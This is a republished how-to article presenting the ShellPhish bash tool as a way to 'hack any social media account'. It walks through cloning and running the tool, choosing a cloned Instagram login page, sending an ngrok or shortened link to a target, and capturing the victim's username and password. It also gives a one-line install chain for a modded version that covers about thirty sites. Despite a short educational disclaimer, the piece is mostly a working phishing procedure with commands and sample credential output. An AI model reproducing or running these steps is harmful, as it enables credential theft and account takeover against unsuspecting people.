DISCLAIMER: The author and the publishing website (Computer Forensics Lab) assume no responsibility for any misuse or damage caused by Shellphish. This is republished here for educational purposes ONLY.
Inthis article we are going to see how we can hack any social media account using a tool called ShellPhish from GitHub. So you want to hack an Instagram account or Facebook account or any other social media account…..??. Well you have come to the right place. So lets get started, shall we 🙂
Before we get into any technical stuff,
What is ShellPhish ?
ShellPhish is a phishing tool written in bash by thelinuxchoice. It offers a total of 18 phishing websites and one custom website which you can send to the target and after they login, bingo you have the creds. The good thing about this tool is that you don’t have to go through the hassle of setting up a hosting service or port forwarding. Yes, you guessed it right it does everything by itself, awesome right…… ? :0
It uses Ngrok for port forwarding and PHP server to host all the phishing websites.
What is Ngrok ?
Ngrok exposes local servers behind NATs and firewalls to the public internet over secure tunnels.
How it works ?
You download and run a program on your machine and provide it the port of a network service, usually a web server.
It connects to the ngrok cloud service which accepts traffic on a public address and relays that traffic through to the ngrok process running on your machine and then on to the local address you specified.
Usage of Shellphish for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Now let’s see how we can install this awesome tool in your Linux system.
We will use git to download this tool directly from GitHub or you can download the zip and install. Git is installed by default on most of the Linux machines if it’s not installed follow any tutorial online to know-how.
Now we have ShellPhish downloaded.
root@kali:~# git clone https://github.com/thelinuxchoice/shellphish.git
Cloning into 'shellphish'...
remote: Enumerating objects: 521, done.
remote: Counting objects: 100% (521/521), done.
remote: Compressing objects: 100% (332/332), done.
remote: Total 521 (delta 188), reused 506 (delta 182), pack-reused 0
Receiving objects: 100% (521/521), 13.13 MiB | 1.87 MiB/s, done.
Resolving deltas: 100% (188/188), done.
Now let’s see what is inside
LICENSE README.md shellphish.sh sites
we are pretty much done here although I am going to walk you through the steps until we get the creds ;). All we need is to run the shellphish.sh script and we are good to go.
Before we run the script lets check the file with ls -la
root@kali:~/shellphish# ls -latotal 72
drwxr-xr-x 4 root root 4096 May 3 12:03 .
drwxr-xr-x 14 root root 4096 May 3 12:03 ..
drwxr-xr-x 8 root root 4096 May 3 12:03 .git
-rw-r--r-- 1 root root 35265 May 3 12:03 LICENSE
-rw-r--r-- 1 root root 1433 May 3 12:03 README.md
-rw-r--r-- 1 root root 15297 May 3 12:03 shellphish.sh
drwxr-xr-x 21 root root 4096 May 3 12:03 sites
Uh-oh we don’t have the execute permissions lets give the script those executable permissions by
chmod +x shellphish.sh
Now we can run the script with any of the commands down below
# ./shellphish.sh# bash shellscript.sh
If you don’t have Ngrok installed don’t worry this will install it for you.
_ _ _ _ ______ _ _ _
| | | | | || |(_____ \ | | (_) | |
\ \ | | _ ____ | || | _____) )| | _ _ ___ | | _
\ \ | || \ / _ )| || || ____/ | || \ | | /___)| || \
_____) )| | | |( (/ / | || || | | | | || ||___ || | | |
(______/ |_| |_| \____)|_||_||_| |_| |_||_|(___/ |_| |_| v1.8.:.:. Phishing Tool coded by: @linux_choice .:.:.:: Disclaimer: Developers assume no liability and are not ::
:: responsible for any misuse or damage caused by ShellPhish :: Instagram  Origin  Gitlab
 Facebook  Steam  Pinterest
 Snapchat  Yahoo  Custom
 Twitter  Linkedin  Exit
 Github  Protonmail
 Google  WordPress
 Spotify  Microsoft
 Netflix  InstaFollowers[*] Choose an option:
This will prompt you to choose any option just choose whatever option you like. I am choosing option 1 Instagram.
[*] Choose an option: 1
[*] Downloading Ngrok...
[*] Starting php server...
[*] Starting ngrok server...
[*] Send this link to the Target: https://e27f9c07.ngrok.io[*] Or using tinyurl: http://tinyurl.com/ya25v565[*] Waiting IPs and Credentials, Press Ctrl + C to exit...
Now this will give two links
1) The one generated from the Ngrok server and
2) the one shortened
All you have to do now is to send any one of the links to the target and wait for them to log in.
It doesn’t login you when you press the login rather it redirects to the authentic Instagram page which I think is helpful to fool the target.
[*] Waiting Credentials and Next IP, Press Ctrl + C to exit...[*] Credentials Found!
[*] Account: Pyroot
[*] Password: Password123
[*] Saved: sites/instagram/saved.usernames.txt
Hurrah……..!!!! we have successfully hacked the victim without him/her knowing.
Modded version of ShellPhish authored by @AbirHasan2005 making it ShellPhish v2.5. This will include the following:
Phishing Tool for Facebook, Instagram, Google, Microsoft, Netflix, PayPal, Steam, Twitter, PlayStation, GitHub, Twitch, Pinterest, Snapchat, Linkedin, Ebay, Dropbox, Protonmail, Spotify, Reddit, Adobe, DeviantArt, Badoo, Origin, CryptoCoin, Yahoo, WordPress, Yandex, StachoverFlow & VK. This is a modified version of ShellFish, ShellPhish & Zphisher.
- Updated to v2.5:
- Added 2020 New Login/Phishing Page.
- Added Traditional Login Page.
- Added Advanced Voting Poll Login Page.
- Added Fake Security Login Page.
- Added Facebook Messenger Login Page.
- Improvements in ShellPhish Logo.
- Added New Sites.
- Added 4 Port Forwarding Options.
 Facebook  Twitch  DeviantArt  Instagram  Pinterest  Badoo  Google  Snapchat  Origin  Microsoft  Linkedin  CryptoCoin  Netflix  Ebay  Yahoo  PayPal  Dropbox  WordPress  Steam  Protonmail  Yandex  Twitter  Spotify  StackoverFlow  PlayStation  Reddit  VK  GitHub  Adobe
- Colourized Text
- In-built Setup for Termux
- More extra features
- More improvements
- Bugs cleared
- Fixed URL not showing
apt update && apt upgrade -y && apt install git wget php unzip curl -y && git clone https://github.com/AbirHasan2005/ShellPhish && cd ShellPhish && chmod +x * && bash shellphish.sh
cd ShellPhish bash update.sh
This is in development. If you find any problems than please report them to my Telegram Group. To work properly in Android you have to Turn On Mobile Data and Hotspot. Without Mobile Data and Hotspot sometimes it not generates Phishing URL.